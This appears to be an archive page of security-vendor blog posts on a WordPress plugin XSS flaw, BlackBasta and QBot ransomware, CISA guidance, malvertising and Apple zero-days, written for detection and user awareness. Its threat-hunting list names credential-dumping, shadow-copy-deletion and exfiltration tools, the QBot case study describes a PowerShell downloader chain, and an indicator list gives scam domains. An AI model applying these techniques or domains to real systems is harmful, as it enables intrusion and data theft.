IT NEWS

“Beautiful Cookie Consent Banner” WordPress plugin vulnerability: Update now!

WordPress plugins are under fire once more, and you’re advised to update your version of Beautiful Cookie Consent Banner as soon as possible. The plugin, which is installed on more than 40,000 sites, has been impacted by a “bizarre campaign”  being actively used since at least February 5 of this year.

The plugin is designed to present users with a cookie banner “without loading any external resources from third parties”. Sadly the cookie has crumbled with a flaw leaving sites open to the possibility of rogue JavaScript abuse.

The flaw was actually patched way back in January, but considering how long some folks can leave updates it’s going to take a while to have this one settle down. The best example of this update-related security drag is the fact that despite the plugin update, attacks are still in full flow. Researchers have observed:

3 million attacks against more than 1.5 million sites, from nearly 14,000 IP addresses since May 23, 2023.

The plugin exploit is a cross-site scripting attack (XSS), a type of attack that injects malicious code into otherwise benign websites. Most XSS attacks require users to click on doctored links, and only work if they do, because the malicious code isn’t retained by the site being attacked. The vulnerability in the Beautiful Cookie Consent banner allows for the more dangerous stored XSS, in which an attacker causes the site to remember the malicious code and regurgitate it to all of its users.

The potential for mischief and mayhem with this kind of compromise is large. Perhaps someone could use scripts to redirect visitors to malware, or phishing pages, or even create malicious admin users. Maybe the rogue admin could add a phishing login page to the website itself, without the real admins knowing about it.

What’s interesting with this one, and perhaps why it’s being tagged as “bizarre”, is that the attack is misconfigured with attacks containing a “partial payload”. In essence, bits of JavaScript code are missing. As the researchers put it, the misconfigured exploit…

…expects a customised payload, and the attacker has simply failed to provide one.

Even so, they note that even in its misconfigured state it still has the potential to corrupt the configuration of the plugin so it will no longer work as expected. There is also the possibility of the individual(s) responsible adding in a functional payload at a later date.

The latest version of the plugin is 2.10.2. Anything below this is at risk of attack. If your site has been impacted by this vulnerability, once you upgrade patched versions will repair alterations made by said attack. If you think you might be at risk, or you’re unsure which version you’re running, now is the time to pop over to the plugin’s WordPress page and see if an update is required.

Attacks are ongoing, and will likely continue. Numbers have ramped up dramatically over the past month, so it would be best to lock your site plugins down now. In fact, it would probably be a good idea to check the update status of all of your site plugins. Why wait until you see the name of something you use appearing in a news article next month when you can get one step ahead of the game right now?

Keeping WordPress safe

The following preventative maintenance could save you a lot of trouble:

  • Update existing plugins. If you use WordPress you can check if you have any plugins that need updating by logging in to your site and going to Dashboard > Updates. (The Themes and Plugins menu items will also have red circles next to them if any need updating.) Update everything.
  • Turn on automatic updates for plugins. By default, WordPress does not update plugins automatically. You can enable this on a per-plugin basis by going to the Plugins screen and clicking Enable auto-updates next to each plugin.
  • Remove unsupported plugins. Go to the Plugins screen and click View details for each plugin. This screen shows you the last version of WordPress the plugin was tested with, and when it was last updated. It will also display an alert if it thinks the plugin is no longer supported.
  • Remove unnecessary plugins. Check out how many plugins and themes you have installed on your site. Do you need them all? Can any of them be removed or replaced? Generally, fewer is better.

If you can’t make enough time available to keep on top of theme and plugins, it might be a good time to accept that you don’t need the risk and hand the job to an agency or hosting company.


Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Rheinmetall attacked by BlackBasta ransomware

On Friday May 19, 2023, the German arms producer Rheinmetall acknowledged a cyber-incident at one of it’s subsidiaries in the private sector. The BlackBasta ransomware group has already claimed responsibility for the attack through its leak-site.

Entry for Rheinmetall on BlackBasta leak site
Entry for Rheinmetall on BlackBasta leak site

Rheinmetall’s main activities are in the automobile industry and weapons manufacturing, and it descibes itself as one of the world’s largest manufacturers of military vehicles and ammunition.

The company said the attack did not affect production in the arms division, but German media is reporting that the attack was not limited to one subsidiary.

A spokesman for the Central and Contact Point Cybercrime (ZAC NRW) at the Cologne public prosecutor’s office confirmed corresponding knowledge of an incident in the early evening. They were unable to provide information about the severity of the attack given that the investigation was still ongoing.

Although BlackBasta is believed to be largely based in a Russian-speaking country, the attack is not likely to have been directed at the arms industry as such, despite the the ongoing conflict between Russia and Ukraine. BlackBasta’s main objective is to find financially attractive targets. And as we noted in our report on ransomware in Germany, in the last year Black Basta has had a liking for targets in Germany, and conducts attacks there far more frequenty than in the UK or France.

Only LockBit—the preeminent global ransomware threat—has more known attacks in Germany in the last year.

Monthly ransomware attacks in Germany with LockBit and Black Basta highlighted, April 2022 - March 2023
Monthly ransomware attacks in Germany with LockBit and Black Basta highlighted, April 2022 – March 2023

BlackBasta is not very different from other ransomware groups in the way it operates. Similar to others, the gang’s attacks frequently begin with initial access gained through phishing attacks. A typical attack might start with an email containing a malicious document in a zip file. Upon extraction, the document installs the Qakbot banking trojan to create backdoor access, and deploy SystemBC, which sets up an encrypted connection to a command and control server. From there, CobaltStrike is installed for network reconnaissance and to distribute additional tools.

As is the overarching trend for ransomware groups these days, Black Basta’s primary goal is to steal data so that it can hold the threat of leaked it over its victims. The data is generally stolen using the command line program Rclone, which filters and copies specific files to a cloud service. After the data is copied, the ransomware encrypts files and gives them the “.basta” extension, erases volume shadow copies, and presents a ransom note named readme.txt on affected devices. Attackers using Black Basta may be active on a victim’s network for two to three days before running their ransomware.

How to avoid ransomware

  • Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
  • Prevent intrusions. Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
  • Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
  • Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
  • Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
  • Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

CISA updates ransomware guidance

The Cybersecurity and Infrastructure Security Agency (CISA) has updated its #StopRansomware guide to account for the fact that ransomware actors have accelerated their tactics and techniques since the original guide was released in September of 2020.

The #StopRansomware guide is set up as a one-stop resource to help organizations reduce the risk of ransomware incidents through best practices to detect, prevent, respond, and recover from them, including step-by-step approaches to address potential attacks.

Specifically, the agency added:

  • Recommendations for preventing common initial infection vectors
  • Updated recommendations to address cloud backups and zero trust architecture (ZTA).
  • Threat hunting tips for detection and analysis of ransomware actors

Since the CISA list of recommendations is huge we will focus on the new points, with links to further Malwarebytes resources, and add our own set of recommendations at the end.

Updated CISA guidance

  • Limit the use of RDP and other remote desktop services. If RDP is necessary, apply best practices. Threat actors often gain initial access to a network through exposed and poorly secured remote services, and later traverse the network using the native Windows RDP client. Threat actors also often gain access by exploiting virtual private networks (VPNs) or using compromised credentials.
  • Implement phishing-resistant multi-factor authentication (MFA) for all services, particularly for email, VPNs, and accounts that access critical systems. Escalate to senior management upon discovery of systems that do not allow MFA, systems that do not enforce MFA, and any users who are not enrolled with MFA.
  • Consider employing password-less MFA that replace passwords with two or more verification factors (e.g., a fingerprint, facial recognition, device pin, or a cryptographic key).
  • Consider subscribing to services that monitor the dark web for compromised credentials.
  • Create policies to include cybersecurity awareness training about advanced forms of social engineering for personnel that have access to your network. Training should include tips on being able to recognize illegitimate websites and search results. It is also important to repeat security awareness training regularly to keep your staff informed and vigilant.
  • Consider using a multi-cloud solution to avoid vendor lock-in for cloud-to-cloud backups in case all accounts under the same vendor are impacted.
  • Implement a zero trust architecture (ZTA) to prevent unauthorized access to data and services. Make access control enforcement as granular as possible. ZTA assumes a network is compromised and provides a collection of concepts and ideas designed to minimize uncertainty in enforcing accurate, least privilege per request access decisions in information systems and services.
  • Employ logical or physical means of network segmentation by implementing ZTA and separating various business units or departmental IT resources within your organization and maintain separation between IT and operational technology.

CISA consider the following to be advanced forms of social engineering:

For organizations that have their own threat hunters and do not use an external Managed Detection and Response (MDR) service, CISA added the following points for enterprise and cloud environments.

For enterprise environments

  • Newly created Active Directory accounts or accounts with escalated privileges, and recent activity related to privileged accounts such as Domain Admins.
  • Anomalous VPN device logins or other suspicious logins.
  • Endpoint modifications that may impair backups, shadow copy, disk journaling, or boot configurations. Look for anomalous usage of built-in Windows tools such as bcdedit.exe, fsutil.exe (deletejournal), vssadmin.exe, wbadmin.exe, and wmic.exe (shadowcopy or shadowstorage). Misuse of these tools is a common ransomware technique to inhibit system recovery.
  • Signs of the presence of Cobalt Strike beacon/client. Cobalt Strike is a commercial penetration testing software suite. Malicious actors often name Cobalt Strike Windows processes with the same names as legitimate Windows processes to obfuscate their presence and complicate investigations.
  • Signs of any unexpected usage of remote monitoring and management (RMM) software (including portable executables that are not installed). RMM software is commonly used by malicious actors to maintain persistence.
  • Any unexpected PowerShell execution or use of PsTools suite.
  • Signs of enumeration of AD and/or LSASS credentials being dumped (e.g., Mimikatz or NTDSutil.exe).
  • Signs of unexpected endpoint-to-endpoint (including servers) communications.
  • Potential signs of data being exfiltrated from the network. Common tools for data exfiltration include Rclone, Rsync, various web-based file storage services (also used by threat actors to implant malware/tools on the affected network), and FTP/SFTP.
  • Newly created services, unexpected scheduled tasks, unexpected software installed, etc.

For cloud environments

  • Enable tools to detect and prevent modifications to IAM, network security, and data protection resources.
  • Use automation to detect common issues (e.g., disabling features, introduction of new firewall rules) and take automated actions as soon as they occur. For example, if a new firewall rule is created that allows open traffic (0.0.0.0/0), an automated action can be taken to disable or delete this rule and send notifications to the user that created it as well as the security team for awareness. This will help avoid alert fatigue and allow security personnel to focus on critical issues.

Malwarebytes’ tips to avoid ransomware

  • Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
  • Prevent intrusions. Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
  • Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
  • Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
  • Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
  • Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Webinar alert: How Coffee County Schools safeguards 7500 students and 1200 staff

We’re excited to announce that our much-anticipated 4th edition of the Byte Into Security webinar series is right around the corner. Scheduled for May 31st at 10:00AM PST/1:00pm EST, this session is a goldmine for those facing the unique challenges of K-12 cybersecurity. The webinar is free, and you can register right now!

We’re bringing Logan Evans, Director of Information Systems at Coffee County Schools in Georgia, into conversation with Marcin Kleczynski, CEO of Malwarebytes. Together, they will explore the intricacies of maintaining robust cybersecurity for a rural school district with 7500 students and 1200 staff, managed by a small but mighty team of 10 IT and security professionals.

Here’s what you can expect from this dialogue:

  • An in-depth understanding of the hurdles faced by Coffee County Schools, in particular a stringent security audit.
  • How Malwarebytes’ Nebula platform has eased the management of cybersecurity for Logan and his team.
  • The role and value of machine learning in the school’s cybersecurity strategy.
  • Tips for balancing a secure environment that remains accessible to end-users.
  • Strategies for overcoming the challenge of hiring IT and security professionals in the education sector.
  • An emphasis on why security awareness training is essential for school districts.

You’ll also get a chance to learn about the cybersecurity threats looming over educational institutions and how to counteract them. 

We look forward to welcoming you to another exciting episode of the Byte Into Security webinar series. Don’t miss out on the chance to get an insider’s perspective on K-12 cybersecurity!

Register Here 

Tracking down a trojan: An inside look at threat hunting in a corporate network

At Malwarebytes, we talk a lot about the importance of threat hunting for SMBs—and not for no good reason, either. Just consider the fact that, when a threat actor breaches a network, they don’t attack right away. The median amount of time between system compromise and detection is 21 days.

By that time, it’s often too late. Data has been harvested or ransomware has been deployed.

Threat hunting helps find and remediate highly-obfuscated threats like these that quietly lurk in the network, siphoning off confidential data and searching for credentials to access the “keys to the kingdom.”

The bad news for small-to-medium sized businesses (SMBs): Manually intensive and costly threat-hunting tools usually restrict this practice to larger organizations with an advanced cybersecurity model and a well-staffed security operations center (SOC).

That’s where Malwarebytes Managed Detection and Response (MDR) comes in.

Malwarebytes MDR is a service that provides around-the-clock monitoring of an organization’s environment for signs of a cyberattack.

But talk is cheap: let’s look at a real time where Malwarebytes MDR successfully helped a company detect and respond to a potent banking Trojan known as QBot.

The Incident

On a date left undisclosed for security reasons, a reputable oil and gas company we’ll refer to as Company 1 experienced an intrusion in their network. The culprit was Qakbot (also known as QBot).

QBot is notorious for its abilities to steal sensitive information, like login credentials, financial data, and personal information, and even create backdoors for additional malware to infiltrate the compromised system. What’s more, it also facilitates remote access to the compromised machines.

QBot has recently been observed being distributed as part of a phishing campaign using PDFs and Windows Script Files (WSF).

easset upload file47677 266184 e

The QBot campaign illustrated (Source: Jerome Segura | Malwarebytes Labs)

QBot attacks start with a reply-chain phishing email, when threat actors reply to a chain of emails with a malicious link or attachment.

easset upload file89775 266184 e

A sample reply-chain phishing email in French, carrying a PDF attachment disguised as a cancellation letter. (Source: BleepingComputer)

Once someone in the email chain opens the attached PDF, they see a message saying, “This document contains protected files, to display them, click on the ‘open’ button.” Clicking the button downloads a ZIP file containing the WSF script.

easset upload file55401 266184 e

The heavily obfuscated script contains a mix of JS and VBScript code that, when run, triggers a PowerShell that then downloads the QBot DLL from a list of hardcoded URLs. This script tries each URL until a file is downloaded to the Windows Temp folder (%TEMP%) and executed.

Once QBot runs, it issues a PING command to check for an internet connection. It then injects itself into wermgr.exe, a legitimate Windows Error Manager program, to run quietly in the background.

The Infection

The initial infection at Company 1 was traced to a laptop in their network.The Qakbot malware used Windows Script File (WSF), executed by WSCRIPT.EXE, to launch a PowerShell script encoded in Base64.

easset upload file52946 266184 e

The Process Graph tile under the Suspicious Activity page in Nebula shows a visual representation of the files or processes touched by the suspicious activity.

easset upload file54071 266184 e

Clicking on the node to view more details, we see WSCRIPT.EXE was used to execute a Windows Script File, which spawned an instance of PS executing a Base64 encoded command.

easset upload file70676 266184 e

Node detail showing malicious encoded PowerShell script.

This script was designed to be patient and stealthy.

It first initiated a waiting period of 4 seconds before creating an array of URLs, presumably leading to malicious websites. The malware then attempted to download a file from each URL, with each file being checked for a minimum size of 100,000 bytes, implying a meaningful content requirement. If a download failed, the script would wait for 4 seconds before moving to the next URL.

The downloaded files were executed using the RUNDLL32.EXE Windows utility, which was invoked from the PowerShell instance. This allowed the downloaded file, dubbed “FreeformOzarkite.marseillais,” to load and execute its malicious payload.

easset upload file29101 266184 e

RUNDLL32.EXE was invoked from the previous instance of PowerShell to execute a malicious payload or module that is stored in the file “FreeformOzarkite.marseillais” in the temporary folder of the infected user. 

The Malicious DLL

A specific DLL file, identified as zibkwyxdtpcrqshpuqkoomcoba.dll, was found to be one of the malicious codes executed by the Qakbot infection.

easset upload file13711 266184 e

Node detail showing the malicious DLL is executed (zibkwyxdtpcrqshpuqkoomcoba.dll).

Decomposition of this DLL revealed several nefarious functions, including:

  • Code injection into other processes.
  • Harvesting of sensitive data, like Chrome and Outlook passwords, Wi-Fi passwords, and Bitcoin wallets.
  • Capturing screenshots.
  • Modifying system settings, like disabling the User Account Control (UAC), to make the system more vulnerable to further attacks.
  • Communication with a remote command and control (C&C) server for data exfiltration and remote command execution.

The team also saw system enumeration utilizing WHOAMI.EXE and IPCONFIG.EXE:

  • whoami /all
  • ipconfig /all

Data Exfiltration and Remediation

The malware attempted to send the collected data to a known Qakbot C2 IP address. This is presumably where the stolen data would be accumulated and analyzed by the malicious actors.

However, the Malwarebytes MDR team promptly detected and contained this threat, taking steps such as cleaning the system of the infection, informing Company 1 of the incident, and providing actionable recommendations to prevent future compromises.

Threat hunting with MDR

easset upload file38670 266184 e

How Malwarebytes MDR works

Threat hunting is essential for small-and-medium-sized businesses, as attackers can potentially remain undetected for over two weeks after compromising a network.

Unfortunately, threat hunting is complicated and requires a dedicated SOC and seasoned cybersecurity staff, barring most SMBs from utilizing this important security practice. 

In this article, we’ve outlined the significant role that Malwarebytes MDR can play in uncovering, managing, and remediating threats like Qakbot, helping you avoid business disruption and financial loss.

Want to learn more about Malwarebytes MDR and threat hunting? Click the link below for a quote. 

Stop Qbot attacks today

Employee guilty of joining ransomware attack on his own company

A 28-year old IT Security Analyst pleaded guilty and will consequently be convicted of blackmail and unauthorized access to a computer with intent to commit other offences.

It all started when the UK gene and cell therapy company Oxford BioMedica fell victim to a cybersecurity incident which involved unauthorized access to part of the company’s computer systems on 27 February, 2018. The intruder notified senior staff members at the company and demanded a ransom. As an IT Security Analyst at the company, Ashley Liles was tasked with investigating the incident.

He worked alongside colleagues and the police in an attempt to mitigate the incident. But at some point he must have decided to use the circumstances to enrich himself. According to the South East Regional Organised Crime Unit (SEROCU), Liles commenced a separate and secondary attack against the company.

As part of his plan he changed the Bitcoin payment address of the attacker to his own in emails to the board members. And he set up an email address very similar to that of the attacker. From that email address he began emailing his employer to pressurize the company to pay the ransom.

Unfortunately for Liles, a payment was never made and the unauthorized access to the private emails was noticed during the investigation. Due to some poor choices when it came to his own security, the police arrested Liles and searched his home.

The unauthorized access to the emails could be traced back to his home address, which gave the police sufficient grounds to seize a computer, laptop, phone, and a USB stick. Despite his attempts to wipe the data from his devices, the police was able to recover enough data to act as evidence to prove his crimes and establish his direct involvement.

Liles denied any involvement for five years. But on May 17, 2023 during a hearing at Reading Crown Court, he changed his plea to guilty. The case has now been adjourned for sentencing at the same court on July 11, 2023.

While this definitely qualifies as an insider threat, this one seems to have been opportunistic rather than premeditated. The term is often associated with disgruntled employees, but they can also be coerced, or jump on an opportunity that presents itself, as Liles did. The case emphasizes the need for effective access control policies, even when an emergency presents itself. You do not want to make the scope of the incident worse by giving up your access policies in light of an investigation.

Access to resources should always be limited to what is needed to get the job done. And incidental access should be revoked when the need is no longer there. We’re not saying that every employee should be treated as a suspect or potential insider threat. That will result in an unworkable situation. But you should have measures in place to limit the damage and find any culprit.

How to avoid ransomware

  • Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
  • Prevent intrusions. Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
  • Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
  • Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
  • Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
  • Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

AI generated Pentagon explosion photograph goes viral on Twitter

Twitter’s recent changes to checkmark verification continue to cause chaos, this time in the realm of potentially dangerous misinformation. A checkmarked account claimed to show images of explosions close to important landmarks like the Pentagon. These images quickly went viral despite being AI generated and containing multiple overt errors for anyone looking at the supposed photographs.

How did this happen?

Until recently, the social media routine when an important news story breaks would be as follows:

  • Something happens, and it’s reported on by verified accounts on Twitter
  • This news filters out to non-verified accounts

“Verified” accounts are now paid for by anybody who wants to sign up to the $8 a month Twitter Blue service. There’s no real guarantee that a checkmarked video game company, celebrity, or news source is in fact who they claim to be. There have been many instances of this new policy injecting some mayhem into social media already. Fake Nintendo dispensing offensive images and the infamous “Insulin is free” Tweet causing a stock dive spring to mind.

People have taken the “anything goes in checkmark land” approach and are running with it.

What’s happening now is:

  • Fake stories are promoted by checkmarked accounts
  • Those stories filter out to non-checkmarked accounts
  • People in search of facts try to find non-checkmarked (but real) journalists and news agencies while ignoring the checkmarked accounts.

This is made more difficult by changes to how Twitter displays replies, as paid accounts “float” to the top of any conversation. As a result, a situation where a checkmarked account goes viral through a combination of real people, genuine “verified” accounts, and those looking to spread misinformation can potentially result in disaster.

In this case, several checkmarked accounts made claims of explosions near the Pentagon and then the White House. 

Bellingcat investigators quickly debunked the imagery for what it is: Poorly done, with errors galore.

Despite how odd the images looked, with no people, mashed up railings, and walls that melt into one another, it made no difference. The visibility of the bogus tweets rocketed and soon there was the possibility of a needless terror-attack panic taking place.

Many US Government, law enforcement, and first responder accounts no longer have a checkmark as they declined to pay for Twitter Blue. Thankfully some have the new grey Government badge, and Arlington County Fire Department was able to confirm that there was no explosion.

What’s interesting about this one is that it highlights how you can post terrible, amateur imagery with no attempt to polish it and enough people will still believe it to make it go viral. In this case, it went viral to the extent that the Pentagon Force Protection Agency had to help debunk it. As Bleeping Computer notes, the PFPA isn’t even verified anymore.

There is no easy answer or collection of tips for avoiding this kind of thing on social media. At least, not on Twitter in its current setup. A once valuable source for breaking, potentially critical warnings about dangerous weather or major incidents simply cannot be trusted as it used to be.

The very best you can do is follow the Government or emergency response accounts which sport the grey badge. There are also gold checkmarks for “verified organisations”, but even there problems remain. A fake Disney Junior account was recently granted a gold check mark out of the blue and chaos ensued.

No, South Park is not coming to Disney Junior.

As for the aim of the accounts pushing misinformation, it’s hard to say. Many paid accounts are simply wanting to troll. Others could be part of dedicated dis/misinformation farms, run by individuals or collectives. It’s also common to see accounts go viral with content, and then switch out to something else entirely once enough reach has been gained. It might be about a different topic, or it could be something harmful.

Even outside the realm of paid accounts, misinformation and fakes can flourish. Just recently, Twitter experienced a return of fake NHS nurses, after having experienced a similar wave back in 2020.

Should any of the fake nurse accounts decide to pay $8 a month, they’ll have the same posting power as the profiles pushing fake explosions. Spam is becoming a big problem on publicly posted and private messages:

AI is already capable of producing realistic looking images, yet the spammers and scammers are using any old picture without care for how convincing it looks. The combination of “breaking news” messaging and an official looking checkmark easily tips it over the edge, and those liable to fall for it simply don’t examine imagery in detail in the first place. Twitter is going to have to invest some serious time into clamping down on spam and bots which naturally help feed the disinformation waves. The big question is: Can the embattled social media giant do it?


Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Malvertising via brand impersonation is back again

Web search is about to embark on a new journey thanks to artificial intelligence technology that online giants such as Microsoft and Google are experimenting with. Yet, there is a problem when it comes to malicious ads displayed by search engines that AI likely won’t be able to fix.

In recent months, numerous incidents have shown that malvertising is on the rise again and affecting the user experience and trust in their favorite search engine. Indeed, Search Engine Results Pages (SERPs) include paid Google ads that in some cases lead to scams or malware.

One particularly devious kind of malvertising is brand impersonation where criminals are buying ads and going as far as displaying the official brand’s website within the ad snippet. We previously reported several incidents to Google and it appeared that those ads using official URLs were no longer getting through. However, just recently we noticed a surge in new campaigns again.

Brand abuse: Scammers exploit users’ trust

It only takes a few seconds between a search and a click on a result, and most of the time that click happens to be on whatever shows up first. This is why advertisers are buying ads on search engines, not only to drive traffic towards their brands but also to outpace potential competitors. Unfortunately, not all advertisers have good intentions and the worst of them will exploit anything they can to put out ads that are malicious.

For about a week we decided to pull some examples and focused on Amazon-related searches since it is a popular search term (although other popular brands are affected as well). The ads we found were not only claiming to be Amazon’s official website, they also displayed the amazon.com URL in the ad.

Malicious ad for Amazon
Figure 1a: Malicious advert

Network traffic
Figure 1b: Related network traffic

Malicious ad for Amazon
Figure 2a: Malicious advert

Network traffic
Figure 2b: Related network traffic

Malicious ad for Amazon
Figure 3a: Malicious advert

Network traffic
Figure 3b: Related network traffic

Malicious ad for Amazon
Figure 4a: Malicious ad

Network traffic
Figure 4b: Related network traffic

Malicious ad for Amazon
Figure 5a: Malicious ad

Network traffic
Figure 5b: Related network traffic

Below is an animation showing what happens when a victim clicks on one of those ads:

Animation showing a click on an ad leading to a tech support scam pageFigure 6: Malicious advert leads to phishing page

While most of the brand impersonations we have seen recently are pushing tech support scams, this is not the only threat facing consumers. For example, we saw an ad that pretended to be Amazon’s login page but instead redirects users to a phishing site, first stealing their password before collecting their credit card number. 

Malicious ad leading to phishing page
Figure 7: A malicious ad leading to a phishing site

How are these criminals evading detection?

Ad URL

Part of the problem here is that advertisers can be legitimate affiliates and associated with the Amazon brand. Here’s an example of a seller that is advertising on Google and has their own page as an affiliate on Amazon:

Proper way to advertise as Amazon affiliate
Figure 8: An advertiser leveraging the Amazon brand correctly

The problem comes when an advertiser that displays a brand’s official URL within the ad snippet (i.e. https://www.amazon.com) is allowed to submit an ad URL that has nothing to do with that brand. We have seen many examples that include URL shorteners, cloaking services or domains freshly registered for the sole purpose of malicious activity.

Spreadsheet used to report malvertising incidents

Figure 9: Incidents related to Amazon searches tracked in malvertising spreadsheet

The screenshot above is part of a document we have shared with Google where we and other researchers track new malvertising campaigns ranging from scams to malware distribution.

Anti-bot traffic funneling and cloaking

Threat actors often rely on traffic filtering services to push malicious content exclusively to intended victims. Practically all the malicious ads we showed earlier used a kind of traffic distribution and filtering system. This market is a bit of a gray area with some companies advertising as anti-bot or anti-fraud providers while others are shamelessly advertising in places frequented by online criminals.

The goal is to not only game Google’s and other ad networks but also to ensure that only qualified traffic is allowed to come through. With most malvertising from click ads, the practice comes down to something called cloaking.

With cloaking, there are two types of URLs used: the legitimate URL (or decoy) and the money URL (the malicious one). In the picture below we see such parameters as well as the threat actor’s money page which contains folders for Amazon (amz) and YouTube – another keyword abused by malvertisers – (ytb) malvertising campaigns:

Cloaking redirect

Figure 10: Cloaking parameters showing the money page

In this specific case we discovered a number of domains registered by the scammer, serving more or less the same purpose. One important thing to remember is that these domains are not immediately seen by Google. For example, the traffic filtering service will detect if a click is from a real user or a machine. It can then decide to forward the bogus click to Amazon’s website and therefore maintain its cover.

Scammer domains

Figure 11: Infrastructure used to redirect Google ads to tech support scams

For real traffic, these domains will act as intermediary to the payload pages which tend to be highly disposable and ever changing. There is a simple reason in that these are clearly malicious and will get reported and taken down. However, it is rare for the malvertising infrastructure to actually be disrupted because it is further upstream and rarely documented properly. This allows threat actors to continue with their malicious ad campaigns and simply swap payload pages.

Can Bard fix Google’s malvertising problem?

We asked Google’s AI chatbot Bard if it could fix the malvertising problem that seems to be plaguing its search engine. At first Bard said it was not able to solve this issue:

Asking Bard if it can fix malvertising

Figure 12: Bard answering a query about malvertising

However, on a second attempt Bard claimed it could after all help to fix the malvertising problem:

Asking Bard if it can fix malvertising again

Figure 13: Bard answering the same question in a different way

Regardless, malvertising is a complex issue and given the billions of daily ad impressions, it’s easy for someone nefarious to abuse any given platform. But we don’t need AI to identify certain elements that allow threat actors to impersonate brands. Also, while educating users about malvertising is important, we can’t blame them for clicking on paid ads that are supposedly verified as trusted.

Needless to say that these incidents will encourage users to install ad blockers at the chagrin of publishers whose revenues are heavily dependent on advertising. In the end, it comes down to the user experience and ensuring that it comes first, before anything else.

We then asked for some tips to protect against malvertising. We couldn’t help but notice that Bard suggested using an ad blocker, although a small disclaimer at the bottom clearly states that Bard may display information that does not represent Google’s views. Indeed, the ad industry accounts for almost 80% of Google’s revenues.

Asking Bard for some tips on malvertising

Figure 14: Bard offers some tips on how to protect from malvertising

Malvertising has been a problem for many years and it’s unlikely to change any time soon. It’s important for users to be aware that criminals can buy ads and successfully bypass security mechanisms all the while impersonating well-known brands. If you decide to type the URL in the address bar instead, remember to be careful not to make a typo. This is another area that is highly targeted by typosquatters and can also involve malvertising redirects.

All of the ads mentioned in this blog post have been reported to Google. We would like to thank the people working in the ad unit for their continued support.

Indicators of Compromise

Redirects:

tinyurl[.]com/amzs10
tinyurl[.]com/amz01111

Cloaking domains:

601rajilg[.]xyz
hesit[.]xyz
maydoo[.]xyz
pizz[.]site
ferdo[.]xyz
tableq[.]xyz
veast[.]site
amazonsell[.]pro
amaazoon[.]org
atzipfinder[.]com

Tech support scam domains:

ryderlawns[.]xyz
akochar[.]site
gerots[.]s3.eu-north-1[.]amazonaws[.]com
pay-pal-customer-helpline-app-tt6y3[.]ondigitalocean[.]app
micrwindow-app-38sqh[.]ondigitalocean[.]app
fekon[.]s3.ap-south-1[.]amazonaws[.]com

Malwarebytes Browser Guard provides additional protection to standard ad-blocking features by covering a larger area of the attack chain all the way to domains controlled by attackers. Thanks to its built-in heuristic engine it can also proactively block never-before-seen malicious websites.

We always recommend using a layered approach to security and for malvertising you will need web protection combined with anti-malware protection. Malwarebytes Premium for consumers and Endpoint Protection for businesses provide real-time protection against such threats.

TRY NOW

Update now! Apple issues patches for three actively used zero-days

Apple has rolled out security updates for Safari 16.5, watchOS 9.5, tvOS 16.5, iOS 16.5, iPadOS 16.5, iOS 15.7.6, iPadOS 15.7.6, macOS Big Sur 11.7.7, macOS Ventura 13.4, and macOS Monterey 12.6.6.

Among the security updates were patches for three actively exploited zero-day vulnerabilities. All these actively exploited vulnerabilities are directly related to the WebKit browser engine.

WebKit is the engine that powers the Safari web browser on Macs as well as all browsers on iOS and iPadOS (all web browsers on iOS and iPadOS are obliged to use it). It is also the web browser engine used by Mail, App Store, and many other apps on macOS, iOS, and Linux.

Devices impacted by the identified exploits include:

  • All iPad Pro models
  • iPad Air (3rd generation and later)
  • iPad (5th generation and later)
  • iPad Mini (5th generation and later)
  • iPhone 6s and later models
  • Mac workstations and laptops running macOS, Big Sur, Monterey, and Ventura
  • Apple Watch (series 4 and later)
  • Apple TV 4K and HD

The updates may already have reached you in your regular update routines, but it doesn’t hurt to check if your device is at the latest update level. If a Safari update is available for your device, you can get it by updating or upgrading macOS, iOS, or iPadOS:

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVE containing the information about the new zero-day is:

